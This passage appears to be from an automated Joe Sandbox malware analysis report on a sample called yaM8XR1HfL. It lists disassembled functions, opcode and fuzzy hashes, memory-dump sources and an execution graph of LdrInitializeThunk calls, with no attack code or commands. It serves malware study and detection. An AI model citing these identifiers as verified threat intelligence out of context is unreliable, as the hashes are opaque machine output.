                • Instruction Fuzzy Hash: 9A1147B1E112198BDB48CFAAE9406DEFBF7FFC8210F14C06AD408A7254DB305A018F51
                Function 0756EAB0 Relevance: .1, Instructions: 60COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2509404040.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7560000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: cf8529a34cd2aa27813872f1b5a0b753d79978ffe8a7318e292e3f2ec2f05838
                • Instruction ID: 61e51a7f522758988d88a38c38b08fc37e1c1bced282f582603b6fca4147e185
                • Opcode Fuzzy Hash: cf8529a34cd2aa27813872f1b5a0b753d79978ffe8a7318e292e3f2ec2f05838
                • Instruction Fuzzy Hash: 8F1159B1E112198BDB18CFABE8456EEFBF7BBC8210F14C03AE408A7314DB304A058B55
                Function 076845D0 Relevance: .1, Instructions: 60COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2509599136.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7680000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2a1c2f73d38391889ce77be6e87b160888accb0c9a163ef6637c789bcbfb585e
                • Instruction ID: d291c51d1009d4c9e5a9cf953c77c436d5b2ba9eb3408c7fa57ae934780f34dc
                • Opcode Fuzzy Hash: 2a1c2f73d38391889ce77be6e87b160888accb0c9a163ef6637c789bcbfb585e
                • Instruction Fuzzy Hash: A71144B1E1121A8BDB48CFAAD94069EFBF7ABC8310F14C12AD408A7214DB305A428B51
                Function 07682CE0 Relevance: .1, Instructions: 60COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2509599136.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7680000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f992b0a1c0d167efe6787505da0f78cb9b54481f0c5e371e0024202878756959
                • Instruction ID: 870293964393ef34e03ef15cffd9582e8ed159a376308ace94ea4cda520868b8
                • Opcode Fuzzy Hash: f992b0a1c0d167efe6787505da0f78cb9b54481f0c5e371e0024202878756959
                • Instruction Fuzzy Hash: B41114B1E116199BDB48DFAAD9406EEFBF7BBC8210F14C13AD409A7214DB305A428F91
                Function 0756F798 Relevance: .1, Instructions: 59COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2509404040.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7560000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 92274a7f9cd3cb3769cef316e5d19102bf8d95ec041a0496e7bc738798081911
                • Instruction ID: 46f792e3eaebb7ded11cd11b53239290ccfa6389e9328dc5d5abef7a934c5daa
                • Opcode Fuzzy Hash: 92274a7f9cd3cb3769cef316e5d19102bf8d95ec041a0496e7bc738798081911
                • Instruction Fuzzy Hash: FE2117B0E116198BDB58CFAAD9416AEFBF7AFC9300F24C16AD408E7254DB305A15CB51
                Function 07682CD0 Relevance: .1, Instructions: 57COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2509599136.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7680000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: dd30320c56cf171001f8587c4e98bb711469d977b1fbcdf6a048317fedee4558
                • Instruction ID: 0e6f5b668a18f4f97c42a2066f40f0bef15b696d9893db44fe3863346826849a
                • Opcode Fuzzy Hash: dd30320c56cf171001f8587c4e98bb711469d977b1fbcdf6a048317fedee4558
                • Instruction Fuzzy Hash: 5C1156B1E112198BDB49CFAAD9506EEFBF3AFC8210F24C17AD408AA214DB304A418B51
                Function 076845C0 Relevance: .1, Instructions: 56COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2509599136.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7680000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3d8f2dc0a919bddc3ef11da183963f001b9759296bf2c4374d934449c3a91ffa
                • Instruction ID: c7cc718fc702d5c9d5dbe8fb3b4ddea35b96bf7ddd1c4255efa3c71c72c7cca4
                • Opcode Fuzzy Hash: 3d8f2dc0a919bddc3ef11da183963f001b9759296bf2c4374d934449c3a91ffa
                • Instruction Fuzzy Hash: 7E2126B1E116598FDB48CFAAD94169EFBF7BFC8310F14C16AD408A7214EB304A55CB51
                Function 0756EAA2 Relevance: .1, Instructions: 54COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2509404040.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7560000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 91abe60ce3f5acd24db4f0c7b5f229224c71dab270dbd26c62f560a20905edc4
                • Instruction ID: 8c7f5c9c5d74d17b6018629c4bd09f473ec10ceb2451015a8e711cf5e4815961
                • Opcode Fuzzy Hash: 91abe60ce3f5acd24db4f0c7b5f229224c71dab270dbd26c62f560a20905edc4
                • Instruction Fuzzy Hash: 05116AB0E122198BDB08CFAAD94569EBBF3BFC8310F14C16AD408A7364DB304A05CB15
                Function 0756F130 Relevance: .0, Instructions: 49COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2509404040.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7560000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: eab6aa48dc3331471fc1b3e95fb7b8a3b16e0fd95122c5e0bd9d7eac6d83c48d
                • Instruction ID: 0cf4edbd161025bec4367316feb9d56451d40ab56937133bf7fd5586236bc0d7
                • Opcode Fuzzy Hash: eab6aa48dc3331471fc1b3e95fb7b8a3b16e0fd95122c5e0bd9d7eac6d83c48d
                • Instruction Fuzzy Hash: 0E11B9B0E1161A8BDB48CFAAD9451DEFAF3BFC9310F14C12AD418A7294DB344A418F51
                Function 07B7F8E8 Relevance: 6.4, Strings: 5, Instructions: 186COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2509920477.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7b70000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: @$@$B$B$Hgq
                • API String ID: 0-1012756375
                • Opcode ID: eb45ccde85d1f994c3dcec3f0b04c79fe003b5c69bec2f0883d49c4830a78441
                • Instruction ID: b794d18bedf2d8b03303baedd5c4766e39acad387f13a72c1647829fa59c8fe9
                • Opcode Fuzzy Hash: eb45ccde85d1f994c3dcec3f0b04c79fe003b5c69bec2f0883d49c4830a78441
                • Instruction Fuzzy Hash: 8951B1B1700206DFD714DF6DC48097ABBB6FF8925071485AAD529CB3A1DB31D842CB91
                Function 07B7F8D8 Relevance: 5.1, Strings: 4, Instructions: 81COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2509920477.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7b70000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: @$@$B$B
                • API String ID: 0-685577651
                • Opcode ID: da6a36660f30b5d34bab4915e50f6f6f81cfdd7ddf35bcffd36ff08787ff902d
                • Instruction ID: b53122d31d308a37129a2d80fab967fe3fe1ff4c24957695dd89c1f052482863
                • Opcode Fuzzy Hash: da6a36660f30b5d34bab4915e50f6f6f81cfdd7ddf35bcffd36ff08787ff902d
                • Instruction Fuzzy Hash: A0219CF1B00216EFEB14CF6DC88497EBBB5EF8A21072441A6E526DB261D730D942CB95
                Function 00EAA0C0 Relevance: 5.0, Strings: 4, Instructions: 49COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2494359920.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_ea0000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: \;cq$\;cq$\;cq$\;cq
                • API String ID: 0-2961067002
                • Opcode ID: 687dad33b4874cdeed49a860baff02bc70326711d9a7ee601106d5feb1866ec9
                • Instruction ID: d9c3e0a773299f2365a611ad022f1e8ec11da51892890200d5bf764117d0a0bd
                • Opcode Fuzzy Hash: 687dad33b4874cdeed49a860baff02bc70326711d9a7ee601106d5feb1866ec9
                • Instruction Fuzzy Hash: 9601D4717102059FCB248E2CC48092673E6AFEE764B2E907AE402EF3A0DB30EC41D752

                Execution Graph

                Execution Coverage:0%
                Dynamic/Decrypted Code Coverage:100%
                Signature Coverage:40%
                Total number of Nodes:5
                Total number of Limit Nodes:1
                execution_graph 82135 14c2c00 82137 14c2c0a 82135->82137 82138 14c2c1f LdrInitializeThunk 82137->82138 82139 14c2c11 82137->82139 82140 14c2ad0 LdrInitializeThunk

                Executed Functions

                Function 014C2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 5 14c2b60-14c2b6c LdrInitializeThunk
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 7b75441e3979ebec0a08728ff4c9197d3288127061c8aad46063b6d6a74fcb44
                • Instruction ID: 4639442e80481dde93612ad6993612acd17c85473c606e7c53884caf3f70f4d6
                • Opcode Fuzzy Hash: 7b75441e3979ebec0a08728ff4c9197d3288127061c8aad46063b6d6a74fcb44
                • Instruction Fuzzy Hash: 8490026520241103450571584424626401A97F0201B55C022E10145A1DC63589916226
                Function 014C2BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 6 14c2bf0-14c2bfc LdrInitializeThunk
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: def197d8805a021bd18d15c71037d9375a7dbc85d72e564f418874b8a0706f4d
                • Instruction ID: 06bd5004733390e9177442a93b9ea3d8c1dec0a77ee19254f40e6319dba6ac22
                • Opcode Fuzzy Hash: def197d8805a021bd18d15c71037d9375a7dbc85d72e564f418874b8a0706f4d
                • Instruction Fuzzy Hash: FC90023520141902D5807158441465A001597E1301F95C016E0025665DCB258B5977A2
                Function 014C2AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 4 14c2ad0-14c2adc LdrInitializeThunk
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: fb91486ac62529e605e69513fb7a1945d22b2730c13c43b3de7cbd03546c12d9
                • Instruction ID: 5cd1d98db132ea6dbae6cfccb2e0de4333bf602dbf06bdf27dd55b64b6319e06
                • Opcode Fuzzy Hash: fb91486ac62529e605e69513fb7a1945d22b2730c13c43b3de7cbd03546c12d9
                • Instruction Fuzzy Hash: 5D90043D311411030505F55C07145170057D7F5351355C033F1015571CD731CD715333
                Function 014C2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 9 14c2d10-14c2d1c LdrInitializeThunk
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 27c16ec26163f9a07503f3581a259b0f9c6b65a8170a6aac0e901dad9c199a2f
                • Instruction ID: 8f9de0f14505c226f7f74d28c06bc5f4452eabad1088301921b67fbae3bca602
                • Opcode Fuzzy Hash: 27c16ec26163f9a07503f3581a259b0f9c6b65a8170a6aac0e901dad9c199a2f
                • Instruction Fuzzy Hash: 4C90022D21341102D5807158541861A001597E1202F95D416E0015569CCA2589695322
                Function 014C2D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 10 14c2d30-14c2d3c LdrInitializeThunk
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: b4b43ef3f8873576f7278260dbb8f4d7e74e4cba20107cccef5092b2444484f3
                • Instruction ID: e86b3825cb787c5d16f5647e2c44fcca1ac62613c15468590b3705a9b095dd90
                • Opcode Fuzzy Hash: b4b43ef3f8873576f7278260dbb8f4d7e74e4cba20107cccef5092b2444484f3
                • Instruction Fuzzy Hash: 4A90022530141103D540715854286164015E7F1301F55D012E0414565CDA2589565323
                Function 014C2DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 11 14c2dd0-14c2ddc LdrInitializeThunk
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: fe44b76d1768a0cba46e2a8b8e04a55e2b8e81191a2dc062dec5ca8431a9ae69
                • Instruction ID: ce4dbc81f105bee37c58154a9377547457d2af2b5cacd36a005293849b04d115
                • Opcode Fuzzy Hash: fe44b76d1768a0cba46e2a8b8e04a55e2b8e81191a2dc062dec5ca8431a9ae69
                • Instruction Fuzzy Hash: D3900225242452525945B15844145174016A7F0241795C013E1414961CC6369956D722
                Function 014C2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 12 14c2df0-14c2dfc LdrInitializeThunk
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: c8407547e3b9781a02713f37d16134b1cf4d89cbe864bcd6e7364a4a0d8d0bb5
                • Instruction ID: 8611d201e41743b4f0811f0e4c503ac1a98d5e7fccb8b31bd49deb6e7116254c
                • Opcode Fuzzy Hash: c8407547e3b9781a02713f37d16134b1cf4d89cbe864bcd6e7364a4a0d8d0bb5
                • Instruction Fuzzy Hash: 4D90023520141513D51171584514717001997E0241F95C413E0424569DD7668A52A222
                Function 014C2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 7 14c2c70-14c2c7c LdrInitializeThunk
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: a7d476c76ee52e0b5f15de25e9b1296359e5b632c054fe9641fcbfbd544a016b
                • Instruction ID: 7c6a84d9b696c97391ccaee6eaa549fcb0e4daf792631a47772d433ce4482003
                • Opcode Fuzzy Hash: a7d476c76ee52e0b5f15de25e9b1296359e5b632c054fe9641fcbfbd544a016b
                • Instruction Fuzzy Hash: A190023520149902D5107158841475A001597E0301F59C412E4424669DC7A589917222
                Function 014C2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 8 14c2ca0-14c2cac LdrInitializeThunk
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: cbb6a73f60e8f8073d3784e50853760ae7f8ec0f947bbf40834869ef8910db2a
                • Instruction ID: 208e9bef2e5110b901e37eadc7906d11f72c9a8beaa3a00dcf14c2e0f9971479
                • Opcode Fuzzy Hash: cbb6a73f60e8f8073d3784e50853760ae7f8ec0f947bbf40834869ef8910db2a
                • Instruction Fuzzy Hash: 0E90023520141502D50075985418656001597F0301F55D012E5024566EC77589916232
                Function 014C2F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 15 14c2f30-14c2f3c LdrInitializeThunk
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 6acd05e6f4a3c3903d64ad42779d48374684c22199d65f815931964ffcd01678
                • Instruction ID: 97b4eba81561f3f34a26fe804593c91f0bf82e64600001a3445943c408c0bc39
                • Opcode Fuzzy Hash: 6acd05e6f4a3c3903d64ad42779d48374684c22199d65f815931964ffcd01678
                • Instruction Fuzzy Hash: E190026534141542D50071584424B160015D7F1301F55C016E1064565DC729CD526227
                Function 014C2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: e596b3ca047d9d1a448d7f3d7e99211486b223dd529c5c78c6d4356637f295c4
                • Instruction ID: c8d403a259f58391e98d1f4358d7ae00909482fb1a260e76d8c181750b1d1bea
                • Opcode Fuzzy Hash: e596b3ca047d9d1a448d7f3d7e99211486b223dd529c5c78c6d4356637f295c4
                • Instruction Fuzzy Hash: 56900225211C1142D60075684C24B17001597E0303F55C116E0154565CCA2589615622
                Function 014C2F90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 16 14c2f90-14c2f9c LdrInitializeThunk
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 10588005a652c7251cf855370725bfebb70ceb54605dd5460d98a3e042f3fe99
                • Instruction ID: e04a06e9ef851c47ead11e164a3ec85a0561e607c56afcea269e805ba936e15f
                • Opcode Fuzzy Hash: 10588005a652c7251cf855370725bfebb70ceb54605dd5460d98a3e042f3fe99
                • Instruction Fuzzy Hash: 9090023520181502D5007158482471B001597E0302F55C012E1164566DC73589516672
                Function 014C2FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 17 14c2fb0-14c2fbc LdrInitializeThunk
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: d81e7faa1eddea000cbea397a3879134db3941161fb22c60224102be4e260e3f
                • Instruction ID: ffce4f6f0c9697523d6dc4588f842fce7cf5f2d9511a25de798dc26234436b1d
                • Opcode Fuzzy Hash: d81e7faa1eddea000cbea397a3879134db3941161fb22c60224102be4e260e3f
                • Instruction Fuzzy Hash: CA900225601411424540716888549164015BBF1211755C122E0998561DC66989655766
                Function 014C2E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 13 14c2e80-14c2e8c LdrInitializeThunk
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 4136025418af190dbf72178da7f4636bb9e6e4829cbca59ab849beb47b18fe90
                • Instruction ID: a1d0951a014c3e8eda2f24fd0653019078ecbfbf4ca1653bf9e95388d4c7595f
                • Opcode Fuzzy Hash: 4136025418af190dbf72178da7f4636bb9e6e4829cbca59ab849beb47b18fe90
                • Instruction Fuzzy Hash: 5890022560141602D50171584414626001A97E0241F95C023E1024566ECB358A92A232
                Function 014C2EA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 14 14c2ea0-14c2eac LdrInitializeThunk
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: da121d8fba8c1a36a406371a8800faa4c398f8316f5ac243cdf14546a347afd8
                • Instruction ID: 91f2eee5b779f75f5bcedb17ea47cfe5b9c4f4a5f8ebf73a5770f328b676a6f7
                • Opcode Fuzzy Hash: da121d8fba8c1a36a406371a8800faa4c398f8316f5ac243cdf14546a347afd8
                • Instruction Fuzzy Hash: 6D90027520141502D54071584414756001597E0301F55C012E5064565EC7698ED56766
